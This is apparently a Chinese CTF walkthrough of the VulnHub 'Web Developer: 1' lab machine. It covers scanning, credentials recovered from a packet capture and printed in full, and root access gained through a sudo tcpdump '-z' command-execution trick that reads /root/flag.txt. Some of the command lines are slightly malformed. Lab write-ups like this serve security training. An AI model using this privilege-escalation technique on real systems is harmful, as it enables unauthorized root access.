vulnhub-Web Developer 1靶机

vulnhub:Web Developer: 1 ~ VulnHub

导入靶机,放在kali同网段,扫描

靶机在192.168.114.129,扫描端口

有网站服务,访问

没什么东西,扫目录

真不少,访问一下,也只是一些普通的Wordpress的页面,换个字典再扫一次

这次多出来一个ipdata目录

里面有个cap文件,下载

在里面找到了账号密码

webdeveloper:Te5eQg&4sBS!Yr$)wf%(DcAd

登录wordpress

靶机似乎有点问题,我这里跳过获取Wordpress的shell,请自行参考别的wp

webdeveloper:MasterOfTheUniverse

登录

根据sudo -l,我们可以运行tcpdump

查看提权网站的使用方式

COMMAND='ls -al /root'

TF=$(mktemp)

echo "COMMAND" \> TF

chmod +x $TF

sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF

执行完成后,再开一个终端,执行命令

nc -v -z -n -w 1 127.0.0.1 1

可以看到原来的终端执行了ls -al /root命令,所以我们只需要替换命令就可以查看flag

COMMAND='cat /root/flag.txt'

TF=$(mktemp)

echo "COMMAND" \> TF

chmod +x $TF

sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF

相关推荐
qq 13740186116 小时前
ISTA6山姆:从包装测试到供应链安全ista6a
功能测试·可用性测试·安全性测试
qq 13740186116 小时前
ISTA6联邦标准全面解析:跨境物流包装的安全通行证
功能测试·可用性测试·安全性测试
zhengfei6112 天前
AI渗透工具—Shannon完全自主的AI渗透测试工具
人工智能·深度学习·web安全·知识图谱·测试覆盖率·安全性测试·威胁分析
lifejump2 天前
Brupsuite-upload fuzz | DeDeCMS_upload
web安全·网络安全·安全性测试
qq 13740186112 天前
GB/T 34986:电子设备可靠性试验的黄金准则
功能测试·可用性测试·安全性测试
国科安芯2 天前
核工业机器人电机驱动器CANFD隔离芯片国产替代方案
单片机·嵌入式硬件·性能优化·架构·机器人·安全性测试
安畅检测齐鲁物联网测试中心2 天前
信息安全性测试:渗透测试怎么做?有哪些注意事项?
安全性测试·cma·cnas·第三方检测机构
国科安芯5 天前
核工业检测系统通信链路的国产化元器件安全等级评估
运维·网络·人工智能·单片机·嵌入式硬件·安全·安全性测试
犬大犬小5 天前
Web 渗透:如何绕过403 Forbidden? Part I
前端·安全性测试·web 安全
qq 13740186116 天前
解码GB/T 4996标准:联运托盘检测核心要点与企业合规指南
功能测试·可用性测试·安全性测试